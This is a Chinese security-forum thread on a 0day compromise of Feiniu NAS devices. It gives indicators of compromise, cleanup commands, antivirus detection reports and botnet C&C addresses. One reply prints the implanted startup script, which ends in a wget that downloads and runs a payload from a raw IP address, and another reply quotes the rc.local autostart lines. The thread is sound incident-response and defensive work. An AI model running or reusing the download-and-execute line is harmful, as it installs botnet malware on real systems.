查看: 366|回复: 10
收起左侧

[病毒样本] 飞牛NAS挂马相关样本

[复制链接]
Loyisa
发表于 2 小时前 | 显示全部楼层 |阅读模式
本帖最后由 Loyisa 于 2026-1-31 12:21 编辑

头一次被0day打 纪念一下
https://qfile.qq.com/q/E2GWTawAgg

vt: https://www.virustotal.com/gui/f ... f7d1e536f47e41229e4



善后环节
进入你的飞牛ssh 如果发现以下文件即可判定为被入侵:
  1. /usr/sbin/gots
  2. /usr/bin/nginx
  3. /usr/trim/bin/trim_https_cgi
复制代码


这两个服务是木马相关的
  1. /etc/systemd/system/trim_https_cgi.service
  2. /etc/systemd/system/nginx.service
复制代码

清理:
  1. chattr -i /etc/systemd/system/nginx.service
  2. rm /etc/systemd/system/nginx.service
  3. chattr -i /etc/systemd/system/trim_https_cgi.service
  4. rm /etc/systemd/system/trim_https_cgi.service
复制代码


/etc/rc.local 也会被加木马自启,可以直接清空或者删掉

然后需要检查下这两个文件是否异常
  1. /usr/trim/bin/system_startup.sh
  2. /etc/modules <- 这个文件里不应该出现snd_pcap 这个模块,看到了请把那行删了
复制代码


清理木马衍生物:
  1. chattr -i /usr/sbin/gots
  2. rm /usr/sbin/gots
  3. chattr -i /usr/bin/nginx
  4. rm /usr/bin/nginx
  5. chattr -i /usr/trim/bin/trim_https_cgi
  6. rm /usr/trim/bin/trim_https_cgi
复制代码


清理后重启观察下那几个服务和/etc/rc.local有没有异常,没有就去马上关掉webui外网访问然后去更新最新系统,他们推了版更新修了那个漏洞
莒县小哥
发表于 2 小时前 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
kkdy
发表于 2 小时前 | 显示全部楼层
火绒高启发kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
猥琐大叔
发表于 2 小时前 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
心醉咖啡
发表于 2 小时前 | 显示全部楼层
360

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Shake2333
发表于 2 小时前 | 显示全部楼层
360云杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
神龟Turmi
发表于 1 小时前 | 显示全部楼层
Gafgyt=Mirai
DDoS Botnet远控
C&C:aura.kabot[dot]icu
20.89.168.131 //日本 东京 azure.com
45.95.212.102 //日本 东京 isif.net
已发投诉

评分

参与人数 1人气 +3 收起 理由
Loyisa + 3 加分鼓励

查看全部评分

naoki
发表于 1 小时前 | 显示全部楼层
我的被植入  "/usr/trim/bin/system_startup.sh"
  1. #!/bin/bash

  2. STATUS="/var/lib/dpkg/status"
  3. BACKUP="/var/lib/dpkg/status.original"


  4. if [ ! -f "$BACKUP" ]; then
  5.     if [ -f "$STATUS" ]; then
  6.         cp "$STATUS" "$BACKUP"
  7.     fi
  8. fi

  9. if [ ! -f "$STATUS" ]; then
  10.     if [ -f "$BACKUP" ]; then
  11.         cp "$BACKUP" "$STATUS"
  12.     fi
  13. fi

  14. rm -rf /var/tmp/trim-update
  15. rm -rf /var/tmp/update-*

  16. wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
复制代码
naoki
发表于 半小时前 | 显示全部楼层
"/etc/rc.local"文件被植入   
# AutoStart
/sbin/gots fnos &

# AutoStart
/sbin/gots x86 &
匿名  发表于 1970-1-1 08:00:00
post_deleted
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-1-31 14:53 , Processed in 0.115987 second(s), 1 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表